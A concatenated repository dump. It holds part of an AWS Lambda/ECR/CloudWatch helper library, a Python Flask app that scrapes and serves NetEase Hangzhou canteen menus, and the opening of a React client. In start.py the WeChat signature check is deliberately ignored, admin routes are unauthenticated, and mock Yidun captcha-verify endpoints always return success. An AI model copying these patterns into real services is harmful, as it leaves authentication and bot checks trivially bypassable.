self.lambda_client.exceptions.ResourceNotFoundException: self._logger.warning('Function: %s does not exist', name) def delete_layer_version(self, name, version): try: self.lambda_client.delete_layer_version(LayerName=name, VersionNumber=version) self._logger.info('Layer: %s version: %s deleted', name, version) except self.lambda_client.exceptions.ResourceNotFoundException: self._logger.warning('Layer: %s version: %s does not exist', name, version) def deploy_layer(self, name, layer_path, description='', runtimes=None): # for layers with more complexity that are better off "just zipped" if layer_path.endswith('.zip'): with open(layer_path, 'rb') as f: zip_file_bytes = f.read() # for layers that consist simply of a flat directory (no subdirs) with code (text) files. else: in_memory_zip = utils.get_layer_zip(layer_path) zip_file_bytes = in_memory_zip.getvalue() file_sha256_string = hashing.get_base64_sum_of_data(zip_file_bytes) for lambda_layer_version in self.list_layer_versions(name): layer_version_meta = self.lambda_client.get_layer_version_by_arn( Arn=lambda_layer_version['LayerVersionArn']) aws_sha256_string = layer_version_meta['Content']['CodeSha256'] if aws_sha256_string == file_sha256_string: self._logger.info('Layer with ARN: %s is already current', lambda_layer_version['LayerVersionArn']) return {'arn': lambda_layer_version['LayerVersionArn'], 'updated': False} if not runtimes: runtimes = ['python3.8'] self._logger.info('Deploying layer: %s in path: %s for runtimes: %s', name, layer_path, runtimes) layer_arn = self.lambda_client.publish_layer_version( LayerName=name, Description=description, # must be a 'bytes' object Content={'ZipFile': zip_file_bytes}, CompatibleRuntimes=runtimes).get('LayerVersionArn') self._logger.debug('Layer ARN: %s', layer_arn) return {'arn': layer_arn, 'updated': True} def deploy_layers(self, layers): for name, layer_meta in layers.items(): layers[name].update(self.deploy_layer(name, layer_meta['path'])) def get_function_arn(self, 
name): return f"arn:aws:lambda:{self._session.region}:{self._sts.account_id}:function:{name}" def list_functions(self): response = self.lambda_client.list_functions() functions = response.get('Functions') while response.get('NextMarker'): response = self.lambda_client.list_functions(NextMarker=response.get('NextMarker')) functions.extend(response.get('Functions')) return functions def list_layers(self): return self.lambda_client.list_layers().get('Layers') def list_layer_versions(self, name): response = self.lambda_client.list_layer_versions(LayerName=name) layer_versions = response.get('LayerVersions') while response.get('NextMarker'): response = self.lambda_client.list_layer_versions(LayerName=name, NextMarker=response.get('NextMarker')) layer_versions.extend(response.get('LayerVersions')) return layer_versions def remove_permission_for_s3_bucket(self, name, bucket): self._logger.info('Attempting to remove permission to invoke function: %s based on events from S3 bucket: %s ' 'if any', name, bucket) try: self.lambda_client.remove_permission(FunctionName=name, StatementId=f'permission_for_{bucket}') # NOTE: there's no clean way to first look up if a permission exists before removing it without re-arranging # this module, so for now we just catch the exception and move on. 
except self.lambda_client.exceptions.ResourceNotFoundException: self._logger.warning('Permission does not yet exist to invoke function: %s based on events from ' 'S3 bucket: %s', name, bucket) <file_sep>import json from madeira import session, sts from madeira_utils import loggers class Ecr(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.ecr_client = self._session.session.client("ecr") def _get_registry_id_for_repo(self, repo_name): for repo in self.ecr_client.describe_repositories().get("repositories"): if repo["repositoryName"] == repo_name: return repo["registryId"] def add_account_to_repo_policy(self, secondary_account_id, repo_name): registry_id = self._get_registry_id_for_repo(repo_name) # it is possible that there is no existing policy try: policy = json.loads( self.ecr_client.get_repository_policy( registryId=registry_id, repositoryName=repo_name ).get('policyText')) self._logger.info("Got existing policy for repo: %s in registry: %s", repo_name, registry_id) except self.ecr_client.exceptions.RepositoryPolicyNotFoundException: self._logger.warning( "There no existing policy for repo: %s in registry: %s", repo_name, registry_id, ) # set an empty base policy to augment hereafter policy = { "Version": "2008-10-17", "Statement": [] } # drop any statements that already have this account referenced for statement in policy["Statement"]: if secondary_account_id in statement.get("Principal", {}).get("AWS"): policy["Statement"].remove(statement) # any principal in the secondary account can describe + retrieve images policy["Statement"].append( { "Effect": "Allow", "Principal": {"AWS": f"arn:aws:iam::{secondary_account_id}:root"}, "Action": [ "ecr:BatchCheckLayerAvailability", "ecr:BatchGetImage", "ecr:GetAuthorizationToken", 
"ecr:GetDownloadUrlForLayer" ] } ) self._logger.info("Setting updated repository policy to allow account: %s to access repo: %s in registry: %s", secondary_account_id, repo_name, registry_id) self.ecr_client.set_repository_policy( registryId=registry_id, repositoryName=repo_name, policyText=json.dumps(policy), ) def delete_images(self, repo, image_ids): return self.ecr_client.batch_delete_image(repositoryName=repo, imageIds=image_ids) def get_image_list(self, repo): # TODO: implement "NextToken" processing return self.ecr_client.list_images(repositoryName=repo, maxResults=1000).get('imageIds') <file_sep>from madeira import session from madeira_utils import loggers class CloudWatch(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.cloudwatch_logs_client = self._session.session.client('logs') def delete_log_groups_in_namespace(self, namespace): # TODO: implement NextToken support self._logger.debug('Getting log groups in namespace (prefixed with): %s', namespace) log_groups_in_namespace = self.cloudwatch_logs_client.describe_log_groups( logGroupNamePrefix=namespace).get('logGroups', []) for log_group in log_groups_in_namespace: self._logger.info('Deleting log group: %s', log_group['logGroupName']) self.cloudwatch_logs_client.delete_log_group(logGroupName=log_group['logGroupName']) def set_log_group_retention(self, log_group, days): return self.cloudwatch_logs_client.put_retention_policy(logGroupName=log_group, retentionInDays=days)
9354026e4ba72cf6a42f054b29292e60e5fabe87
[ "TOML", "Python", "Markdown", "Shell" ]
28
Python
mxmader/madeira
f9d1fbd3b34373571ebb84ab33852b06577e70cf
5a29abf792a3ac08ccda4efda6985883a0fb1736
refs/heads/master
<repo_name>arcsun/neteaseMenu<file_sep>/codepy/menu.py #coding=utf-8 import time import copy import anydbm as dbm import menulog urlhead = 'http://numenplus.yixin.im/singleNewsWap.do?materialId=' frequency = 10800 class Menu: def __init__(self, day= 0): self.today = int(time.strftime('%y%m%d',time.localtime(time.time()))) # 151022 self.returnMaybe = False self.gotoid = False if 0 <= day <= 99: self.today = self.getNextDay(self.today, day) elif 100<= day <= 9999: self.returnMaybe = True elif 10000<= day < 99999: self.gotoid = True self.today = day elif 151027<= day < 991231: self.today = day self.startId = 0 self.result = u'未找到菜单' self.lastQuery = 0 self.now = int(time.time()) self.cache = {} # {151019:15163} # 日期:id self.maybe = [] # 爬到的报错的页面 self.maybeUrl = '' self.tmp = 0 def getNextDay(self, today, step= 1): def calcu(): lastDays = {'0131': '0201', '0228': '0301', '0331': '0401', '0430': '0501', '0531': '0601', '0630': '0701', '0731': '0801', '0831': '0901', '0930': '1001', '1031': '1101', '1130': '1201', '1231': '0101'} # 16年是闰年,暂把2月设成0229 now = str(self.tmp) year = now[0:2] # 15 monthday = now[2:] # 1221 if monthday in lastDays.keys(): if monthday == '1231': year = str(int(year) + 1) tomorrow = lastDays[monthday] self.tmp = int(year + tomorrow) else: self.tmp = int(now)+1 self.tmp = today for i in range(step): calcu() return self.tmp def process(self): def getTime(): return time.strftime('20%y-%m-%d %H:%M:%S', time.localtime()) def getUrl(targetday = self.today): return urlhead + str(self.cache.get(targetday)) def getMaybe(): backup = copy.deepcopy(self.maybe) backup.sort() backup.reverse() self.result += u'\t 可能的url: ' first = True for mid in backup: if mid >= max(self.cache.values()): if first: first = False self.result += u'\t' + urlhead+ str(mid) if self.returnMaybe: self.maybeUrl = urlhead+ str(mid) else: self.result += '\t' + str(mid) else: self.maybe.remove(mid) if not self.maybe: self.result += 'None' else: menulog.debug(self.result) if self.gotoid: 
return urlhead + str(self.today) try: db = dbm.open('datafile', 'r') self.startId = eval(db['startId']) self.lastQuery = eval(db['lastQuery']) self.cache = eval(db['cache']) self.maybe = eval(db['maybe']) db.close() except (IOError, KeyError): msg = u'未找到缓存数据' menulog.debug(msg) return msg if self.today in self.cache.keys(): # 缓存里有就直接返回url menulog.info('find cache @%s'% getTime()) return getUrl() else: # 缓存中查不到 menulog.info('cache not found @%s'% getTime()) if self.result == u'未找到菜单': getMaybe() if self.returnMaybe and self.maybeUrl: return self.maybeUrl else: self.result += u'\t下次刷新:约%d秒后'% (self.lastQuery + frequency - self.now) self.result += u'\t日期:%s'% self.today return self.result <file_sep>/mock.py #coding=utf-8 from flask import Flask, redirect, render_template, request, Response from codepy import menulog import anydbm as dbm import shelve import os, sys import urllib from datetime import datetime import time import urllib2 import hashlib app = Flask(__name__) visit = 0 visitHome = 0 startTime = time.time() cache = {} s = None @app.route('/', methods=['POST', 'GET']) def mockMain(): return "hello mock" @app.route('/api/v1/verify', methods=['POST', 'GET']) def mockYidun(): # 易盾滑块后端验证 resp = Response('{"msg":"success","result":true,"c":1,"error":0}') resp.headers['Content-Type'] = 'application/json;charset=UTF-8' return resp @app.route('/api/v2/verify', methods=['POST', 'GET']) def mockYidun2(): # 易盾滑块后端验证v2 resp = Response('{"msg":"success","result":true,"c":1,"error":0}') resp.headers['Content-Type'] = 'application/json;charset=UTF-8' return resp if __name__ == '__main__': if sys.platform.startswith('win'): # 本地调试 # import webbrowser # webbrowser.open('http://127.0.0.1:8080/') app.run(host='127.0.0.1', port= 8080, debug= True, threaded= True) else: # 线上正式版本 # app.run(host='0.0.0.0', port= 5050, threaded= True) from werkzeug.contrib.fixers import ProxyFix app.wsgi_app = ProxyFix(app.wsgi_app) app.run(host='0.0.0.0', port= 5050) <file_sep>/test_new_url.py # 
coding=utf-8 import urllib import re import urllib2 import cookielib from urllib2 import HTTPError """ 用来测试新的URL GET /wap/material/viewImageText?id=31415424 HTTP/1.1 Host: wap.plus.yixin.im Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 x-wap-profile: http://172.16.31.10/UAProfile/CMCC/MT6797_UAprofile.xml Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Linux; Android 6.0; MZ-PRO 6 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/45.0.2454.94 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,en-US;q=0.8 Cookie: NTESplusSI=6B8336B65EE6B94C690E1E6A42C6691A.yx10.popo.infra.mail-8011; __utma=75741715.572861464.1482587990.1482587990.1482587990.1; __utmb=75741715.2.10.1482587990; __utmc=75741715; __utmz=75741715.1482587990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) """ ua_yixin = 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36' accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' def test(tid, save= False): try: url = 'http://wap.plus.yixin.im/wap/material/viewImageText?id=%s'% tid req = urllib2.Request(url) req.add_header('User-Agent', ua_yixin) # 易信外会有个广告 req.add_header('Accept', accept) # 易信会检测这个 res = urllib2.urlopen(req) text = res.read() t = text.decode('utf-8') # 这里print会报错 if save: f = open('page.html', 'w+') f.write(text) f.close() if t.find(u'今日菜单') != -1 and t.find(u'本帮菜') != -1: return '%s find++++++++++++++++++'% tid, True else: return '%s not find'%tid, False except Exception as e: return '%s error--------------'% tid, False # 这个id似乎是固定的 pageList = { 1: 31415423, 2: 31704345, 3: 31704346, 4: 31700488, 5: 31613351, 6: 31415424, # 待定 } print test(pageList.get(4)) # # result = [] # for i in range(pageList.get(3)+1, pageList.get(3)+2000): # r = test(i) # if r[1]: # result.append(i) # 
print r[0], r[1] # break # print r[0] # print result<file_sep>/README.md #网易(杭州)菜单 v2.7 示例网址: www.crystalpot.cn/menu 微信公众号:neteasemenu 运行环境: python 2.7 Flask==0.10.1 Jinja2==2.8 Werkzeug==0.10.4 bgtask.py: 自动定时抓取信息,需首先执行: (python bgtask.py &) 抓取到的url等信息存储在文件datafile中 run.py: web程序入口, python run.py 或使用gunicorn等启动 gunicorn -b 0.0.0.0:5000 -k gevent run-ol:app 日志记录在menu.log codepy: web和日志部分的代码 读取bgtask.py生成的文件 <file_sep>/restart_mock.sh #!/bin/bash ps -ef | grep "gunicorn -b 0.0.0.0:5050 -k gevent mock:app" | awk '{print $2}' | xargs kill -9 sleep 2 gunicorn -b 0.0.0.0:5050 -k gevent mock:app <file_sep>/bgtask.py # #coding=utf-8 import time import urllib, urllib2 import re import anydbm as dbm from codepy import menulog ''' (python bgtask.py &) 用于抓取菜单信息 地址格式变更?这个可以直接访问 http://wap.plus.yixin.im/wap/material/viewImageText?id=31613351 ''' pattern_title = r"<title>(.+)</title>" pattern_weekday = ur"(星期(.))" pattern_year = ur'20(\d\d)-' pattern_month_update = r'-(\d+)-' pattern_month = r'>(\d+)</span>' pattern_day = ur'月(\d+)日' pattern_day2 = ur'>(\d+)日' urlhead = 'http://numenplus.yixin.im/singleNewsWap.do?materialId=' datafile = 'datafile' startId = 53370 def getWebContent(url): try: url += '&companyId=1' req = urllib2.Request(url) req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3') res = urllib2.urlopen(req) html = res.read().decode('utf-8') return html except Exception as e: menulog.debug(str(e)) return '' class Background: def __init__(self): self.frequency = 10800 # 间隔(秒) self.interval = 150 # 每次爬的id数量 self.back = 0 # 每次从self.startId - self.back开始查找,防止被占坑 self.firstRun = True # 是否在程序开始后先执行一次 self.today = 0 self.running = False # 是否正在运行(否则同一秒会重复执行多次) self.startId = 0 self.count = 0 self.usedId = 0 # 记录中间最大的非空id self.nowId = self.startId self.result = u'未找到菜单' self.lastQuery = 0 self.cache = {} # {151019:15163} # 日期:id self.maybe 
= [] # 爬到的报错的页面 self.empty = 0 self.maxEmpty = 100 # 连续多少空页后中断; 近期总是跳着使用id def getTime(self): return int(time.time()) def schedule(self): if self.firstRun: self.firstRun = False self.process() self.schedule() # 可用Timer().start()替换 else: while True: time.sleep(0.1) # 可以极大减少cpu占用 if self.getTime() % self.frequency == 0 and not self.running: self.running = True self.process() elif self.getTime() % 3600 == 0: # 每3600s记录一次存活信息 menulog.info('%s@%d'% (time.strftime('20%y-%m-%d %H:%M:%S', time.localtime()), self.getTime())) time.sleep(1) def process(self): self.count += 1 self.today = int(time.strftime('%y%m%d', time.localtime())) menulog.info(u'开始第%d次查找@%d'% (self.count, self.getTime())) try: db = dbm.open(datafile, 'c') if not len(db): # 没有之前的数据文件 db['startId'] = str(startId) db['lastQuery'] = str(self.getTime()) db['cache'] = str(self.cache) db['maybe'] = str(self.maybe) self.startId = eval(db['startId']) - self.back self.cache = eval(db['cache']) self.maybe = eval(db['maybe']) self.nowId = self.startId self.lastQuery = self.getTime() # 保存最后搜索时间 while self.nowId - self.startId < self.interval: menulog.info(u'开始查找: %d'% self.nowId) text = getWebContent(urlhead+ str(self.nowId)) if text.find(u'今日菜单') != -1 and text.find(u'本帮菜') != -1: self.empty = 0 try: year = re.findall(pattern_year, text)[0] monthday = re.findall(pattern_month, text) if monthday[0] == '0' and len(monthday)> 2: month = monthday[0]+monthday[1] dayIndex = 2 else: month = monthday[0] dayIndex = 1 if len(monthday) > dayIndex: day = monthday[dayIndex] if len(day) == 1: # 针对 1</span>...>5日&nbsp # 上面的月份也有这种情况 day += re.findall(pattern_day2, text)[0] else: day = re.findall(pattern_day, text)[0] update_month = re.findall(pattern_month_update, text)[0] # 发布菜单的月份,用于跨年 if int(update_month) == 12 and int(month) == 1: year = str(int(year)+1) thisday = int(year+month+day) self.startId = self.nowId if self.cache.has_key(thisday): menulog.info(u'更新%s的菜单id为%s'% (thisday, self.nowId)) self.cache[thisday] = self.nowId 
menulog.info('find %d'% self.nowId) except (IndexError, ): if self.nowId not in self.maybe: self.maybe.append(self.nowId) menulog.debug('IndexError add maybe') else: if text.find(u'请求素材不存在') == -1: # 搜索到的结果页有内容(不是菜单) self.usedId = self.nowId self.empty = 0 else: self.empty += 1 menulog.info('empty(%d) %d'% (self.empty, self.nowId)) if self.empty > self.maxEmpty: menulog.debug('break this round') break self.nowId += 1 # if self.maybe and max(self.maybe) > max(self.cache.values()): # # 取消这个设计, 格式变化太大, 很可能导致卡住 # menulog.info(u'更新起点至可能的ID:%d'% max(self.maybe)) # self.startId = max(self.maybe) if self.usedId > self.startId: menulog.info(u'更新起点至%d'% self.usedId) self.startId = self.usedId # 保存 db['startId'] = str(self.startId) db['lastQuery'] = str(self.lastQuery) db['cache'] = str(self.cache) db['maybe'] = str(self.maybe) menulog.info(u'第%d次查找结束'% self.count) # 已更新的菜单 self.cache = eval(db['cache']) future = [] for day in self.cache.keys(): if day >= self.today: future.append(day) future.sort() db['future'] = str(future) menulog.info(u'更新今后已找到的菜单列表') db.close() except (IOError, EOFError): menulog.info(u'缓存读取/创建异常') finally: self.running = False Background().schedule() <file_sep>/codepy/menulog.py #coding=utf-8 import logging import logging.handlers LOG_FILE = 'menu.log' handler = logging.handlers.RotatingFileHandler(LOG_FILE, maxBytes = 1024*1024, backupCount = 5) # 实例化handler fmt = '[%(levelname)s]%(asctime)s: %(message)s' formatter = logging.Formatter(fmt) # 实例化formatter handler.setFormatter(formatter) # 为handler添加formatter logger = logging.getLogger('menu') # 获取名为tst的logger logger.addHandler(handler) # 为logger添加handler logger.setLevel(logging.DEBUG) def info(msg): print u'[info@szy]%s'% msg logger.info(msg) def debug(msg): print u'[debug@szy]%s'% msg logger.debug(msg)<file_sep>/requirements.txt Flask==0.12 Jinja2==2.9.5 Werkzeug==0.11.15 <file_sep>/restart.sh #!/bin/bash ps -ef | grep "gunicorn -b 0.0.0.0:5000 -k gevent start:app" | awk '{print $2}' | xargs kill -9 ps 
-ef | grep bgtask.py | awk '{print $2}' | xargs kill -9 sleep 2 (setsid python bgtask.py &) gunicorn -b 0.0.0.0:5000 -k gevent start:app <file_sep>/start.py #coding=utf-8 from flask import Flask, redirect, render_template, request, Response from codepy import menulog import anydbm as dbm import shelve import os, sys import urllib from datetime import datetime import time import urllib2 import hashlib app = Flask(__name__) visit = 0 visitHome = 0 startTime = time.time() token = 'hz<PASSWORD>' # 微信公众号的token,自行设置 cache = {} s = None def checkSign(signature, timestamp, nonce): # 微信签名 args = [] args.append("token=%s" % token) args.append("timestamp=%s" % timestamp) args.append("nonce=%s" % nonce) args = sorted(args) raw = "&".join(args) sign = hashlib.sha1(raw).hexdigest() menulog.info(signature) menulog.info(sign) return signature == sign def saveCache(key, content): """ 现在需要服务器中转才能访问,做个简单的缓存 """ if len(cache) >= 10: cache.clear() cache[key] = content def addOne(page= 1): """访问计数""" try: if not s: globals()['s'] = shelve.open('visit_count.dat', writeback=True) if page == 0: s['count_home'] = 0 if s.get('count_home') is None else s['count_home']+1 elif page == 1: s['count_menu'] = 0 if s.get('count_menu') is None else s['count_menu']+1 s.sync() except Exception as e: menulog.debug(e) @app.route('/menu/cache') def getCache(): return str(cache.keys()) def getWebContent(url): try: fname = url.split('?')[1].replace('=', '_') if cache.get(fname): return cache.get(fname) else: req = urllib2.Request(url+ '&companyId=1') # update:增加了这个参数 req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3') res = urllib2.urlopen(req) html = res.read().decode('utf-8') saveCache(fname, html) return html except Exception as e: menulog.debug(str(e)) return '' @app.route('/') def hello_world(): return redirect('/menu') @app.route('/menus/sign') def 
weixin_sign(): # 微信配置认证 menulog.info('weixin sign') signature = request.args.get('signature', '') timestamp = request.args.get('timestamp', '') nonce = request.args.get('nonce', '') echostr = request.args.get('echostr', '') valid = checkSign(signature, timestamp, nonce) if valid: return echostr else: # 目前签名有bug,暂都返回成功 return echostr @app.route('/menu/<int:day>', methods = ['GET', 'POST']) def menu(day=0): # 0今天, 1明天, 151202指定日期 if request.method == 'POST': day = int(request.form['day']) # update:现在易信增加了对User-Agent的限制,必须使用中转的接口了 return redirect('/menus/%s'% day) # from codepy import menu # globals()['visit'] += 1 # menulog.info(u'访问菜单@%s'% visit) # url = menu.Menu(day).process() # if url.startswith('http'): # return redirect(url) # else: # return url @app.route('/menus/<int:day>', methods = ['GET', 'POST']) def menus(day=0): # 为解决微信内跳转卡住的问题, 增加这个方法 # 服务器从易信读取网页信息后再返回给用户 from codepy import menu if request.method == 'POST': day = int(request.form['day']) addOne(1) globals()['visit'] += 1 menulog.info(u'访问菜单@%s'% visit) url = menu.Menu(day).process() if url.startswith('http'): return getWebContent(url) else: return url @app.route('/menus/bus') def bus(): # 班车路线页, 中转一下 addOne(1) globals()['visit'] += 1 menulog.info(u'访问菜单@%s'% visit) url = "http://numenplus.yixin.im/multiNewsWap.do?multiNewsId=17011" # 更新周期很长,暂手动更新 try: return getWebContent(url) except: return u'网页访问出错' def getWeekDayFromDay(daytime): """根据日期(如20160517)计算是星期几""" try: daytime = '20'+ str(daytime) # '20160517' year = int(daytime[:4]) # 2016 month = int(daytime[4:6]) # 5 day = int(daytime[6:8]) # 17 weekday = datetime(year, month, day, 0, 0, 0, 0).weekday() weekdaynames= { 0: u'星期一', 1: u'星期二', 2: u'星期三', 3: u'星期四', 4: u'星期五', 5: u'星期六', 6: u'星期日', } return weekdaynames.get(weekday, u'') except: menulog.debug(u'获取星期几错误') return u'' @app.route('/menu') def menuList(): addOne(0) globals()['visitHome'] += 1 menulog.info(u'访问主页@%s'% visitHome) try: db = dbm.open('datafile', 'c') cache = eval(db['cache']) 
future = eval(db['future']) maybe = eval(db['maybe']) maybe.sort() vals = {} for day in future: vals[day] = cache[day] db.close() weekdays = {} for day in vals.keys(): weekdays[day] = getWeekDayFromDay(day) return render_template('menu.html', vals= vals, days= future, weekdays= weekdays, maybe= maybe, total=(s.get('count_menu'), s.get('count_home'))) except (IOError, KeyError): msg = u'缓存读取错误' menulog.info(msg) return msg @app.route('/menu/manage/hzmenu') def manage(): seconds = int(time.time()- startTime) days = seconds/(24*60*60) if days >= 1: seconds -= 24*60*60*days hours = seconds/(60*60) if hours >= 1: seconds -= 60*60*hours miniutes = seconds/60 if miniutes >= 1: seconds -= 60*miniutes timestr = u'本次已运行:%s天%s小时%s分钟%s秒'% (days, hours, miniutes, seconds) return render_template('manage.html', visit= visit, visitHome= visitHome, timestr= timestr, total=(s.get('count_menu'), s.get('count_home'))) @app.route('/menu/info') def info(): try: db = dbm.open('datafile', 'r') msg = str(db) db.close() return msg except (IOError, KeyError): return u'缓存读取错误' @app.route('/menu/delete/<int:day>', methods = ['GET', 'POST']) def delete(day= 150101): try: db = dbm.open('datafile', 'w') if request.method == 'POST': day = int(request.form['day']) cache = eval(db['cache']) if cache.has_key(day): del cache[day] msg = u'删除%s'% day else: msg = u'del key not found' menulog.info(msg) db['cache'] = str(cache) db.close() return msg except (IOError, KeyError): return u'缓存读取错误' @app.route('/menu/delfuture/<int:day>', methods = ['GET', 'POST']) def delfuture(day= 161300): try: db = dbm.open('datafile', 'w') if request.method == 'POST': day = int(request.form['day']) future = eval(db['future']) if day in future: future.remove(day) msg = u'删除%s'% day else: msg = u'del key not found' menulog.info(msg) db['future'] = str(future) db.close() delete(day) return msg except (IOError, KeyError) as e: print e return u'缓存读取错误' @app.route('/menu/refreshlist') def refreshlist(): try: db = 
dbm.open('datafile', 'w') cache = eval(db['cache']) future = [] today = int(time.strftime('%y%m%d',time.localtime(time.time()))) for day in cache.keys(): if day >= today: future.append(day) future.sort() db['future'] = str(future) msg = u'更新%s后已找到的菜单列表 from homepage'% today menulog.info(msg) db.close() return msg except (IOError, KeyError): return u'缓存读取错误' @app.route('/menu/clear') def clearMaybe(): # 清空可能的菜单(maybe=[]) try: db = dbm.open('datafile', 'w') db['maybe'] = '[]' db.close() msg = u'清空maybe' menulog.info(msg) return msg except (IOError, KeyError): msg = u'缓存读取错误' menulog.info(msg) return msg @app.route('/menu/start/<int:startid>', methods = ['GET', 'POST']) def start(startid= 17000): # 设置起始查找点为指定值 try: if request.method == 'POST': startid = int(request.form['startid']) db = dbm.open('datafile', 'w') db['startId'] = str(startid) db.close() msg = u'设置查找起点ID为:%d'% startid menulog.info(msg) return msg except (IOError, KeyError): msg = u'缓存/POST参数读取错误' menulog.info(msg) return msg @app.route('/menu/add/<int:day>/<int:mid>', methods = ['GET', 'POST']) def add(day= 151203, mid= 17063): # 手动添加一个菜单(偶尔发布者会填错日期) try: db = dbm.open('datafile', 'w') cache = eval(db['cache']) if request.method == 'POST': day = int(request.form['day']) mid = int(request.form['mid']) cache[day] = mid db['cache'] = str(cache) msg = u'更新%s的菜单id为%s'% (day, mid) menulog.info(msg) db.close() return msg except (IOError, KeyError): msg = u'缓存/POST参数读取错误' menulog.info(msg) return msg @app.route('/menu/log/<int:lines>') def readLog(lines= 0): # 读取多少行log, 0为全部 f = None try: files = os.listdir('./') files.sort() logs = [] for fname in files: if fname.startswith('menu.log'): logs.append(fname) if logs: f = open(logs[-1]) contents = f.readlines() content = '' if lines == 0: lines = len(contents) line = 0 for msg in reversed(contents): line += 1 if line < lines: content += msg+ '<br>' else: break return content.decode('utf-8') else: return u'暂无日志' except IOError: return '读取日志出错' finally: if f: 
f.close() @app.route('/api/v1/verify', methods=['POST', 'GET']) def mockYidun(): resp = Response('{"msg":"success","result":true,"c":1,"error":0}') resp.headers['Content-Type'] = 'application/json;charset=UTF-8' return resp @app.route('/api/v2/verify', methods=['POST', 'GET']) def mockYidun2(): resp = Response('{"msg":"success","result":true,"c":1,"error":0}') resp.headers['Content-Type'] = 'application/json;charset=UTF-8' return resp if __name__ == '__main__': if sys.platform.startswith('win'): # 本地调试 # import webbrowser # webbrowser.open('http://1192.168.3.11:80/menu') app.run(host='127.0.0.1', port= 80, debug= True) elif len(sys.argv)> 1: # 线上调试, 随便传个参数 app.run(host='0.0.0.0', port= 5000, debug= True) else: # 线上正式版本, 用gunicorn启动 from werkzeug.contrib.fixers import ProxyFix app.wsgi_app = ProxyFix(app.wsgi_app) app.run(host='0.0.0.0', port= 5000) <file_sep>/test.py # coding=utf-8 import urllib import re import urllib2 """ 用来测试新的正则 """ def test(): pattern_title = r"<title>(.+)</title>" pattern_weekday = ur"(星期(.))" pattern_year = ur'20(\d\d)-' pattern_month_update = r'-(\d+)-' pattern_month = r'>(\d+)</span>' pattern_day = ur'月(\d+)日' pattern_day2 = ur'>(\d+)日' urlhead = 'http://numenplus.yixin.im/singleNewsWap.do?materialId=' datafile = 'datafile' page = urllib.urlopen(urlhead+ str(36673)) text = page.read().decode('utf-8') if text.find(u'今日菜单') != -1: print 'find' year = re.findall(pattern_year, text)[0] print 'year: %s'% year monthday = re.findall(pattern_month, text) print 'monthday: %s'% monthday if monthday[0] == '0' and len(monthday)> 2: month = monthday[0]+monthday[1] dayIndex = 2 else: month = monthday[0] dayIndex = 1 print 'month: %s'% month if len(monthday) > dayIndex: day = monthday[dayIndex] if len(day) == 1: # 针对 1</span>...>5日&nbsp day += re.findall(pattern_day2, text)[0] else: day = re.findall(pattern_day, text)[0] print 'day: %s'% day update_month = re.findall(pattern_month_update, text)[0] # 发布菜单的月份,用于跨年 if int(update_month) == 12 and int(month) 
== 1: year = str(int(year)+1) thisday = int(year+month+day) print 'thisday: %s'% thisday print 'update_month: %s'% update_month else: print 'not find' def test2(mid): req = urllib2.Request('http://numenplus.yixin.im/singleNewsWap.do?materialId=%s&companyId=1'% mid) req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3') try: res = urllib2.urlopen(req, timeout= 5) html = res.read().decode('utf-8') return html, html.find(u'今日菜单') != -1, html.find(u'请求素材不存在') != -1 except Exception as e: print mid, e return 'timeout', False, True def testBus(mid): url = "http://numenplus.yixin.im/multiNewsWap.do?multiNewsId=%s"%mid req = urllib2.Request(url+ '&companyId=1') req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3') res = urllib2.urlopen(req) html = res.read().decode('utf-8') return html for i in range(69948, 70100): result = test2(i) if result[1] is True: key = 'menu' elif result[2] is False: key = 'exist' else: key = 'p' print i, result[1], result[2], key # # for i in range(10490, 11000): # r = testBus(i) # if r.find(u'杭州网易班车线路') != -1: # print i, True, '+++++++++++' # elif r.find(u'请求多图文素材不存在') != -1: # break # else: # print i
d19ff57c98e244489115e071924d6164c72141f0
[ "Markdown", "Python", "Text", "Shell" ]
11
Python
arcsun/neteaseMenu
884f8b9808edec8009e9a194a43bee67c7134d66
de8a671157d6cb88afbbd9df724957ca051b713c
refs/heads/master
<file_sep>
// App.js — root component of a MERN image-upload client.
// On mount it validates any stored JWT against the backend and hydrates the
// shared Usercontext; routing is react-router-dom v5 (Switch/Redirect).
// NOTE(review): axios is imported under the misspelled alias `axiox`
// (used consistently, so it works); `history.push` targets elsewhere in this
// repo assume the "/accessuser" route registered here.
import React,{useState,useEffect} from 'react'
import Usercontext from './Context/Usercontext'
import axiox from 'axios'
import { BrowserRouter, Route, Switch,Redirect} from "react-router-dom";
import Login from './auth/Login';
import Register from './auth/Register';
import Home from './components/Home';

function App() {
  // Shared auth state published through Usercontext to every child route.
  const [userData, setuserData] = useState({
    token:undefined,
    userName:undefined,
    userEmail:undefined,
    userId:undefined,
  })

  // On mount: check token validity, then fetch the user profile.
  // NOTE(review): the try/catch wraps only the *synchronous* call to
  // checkLoginuser(); rejections of the un-awaited async function are not
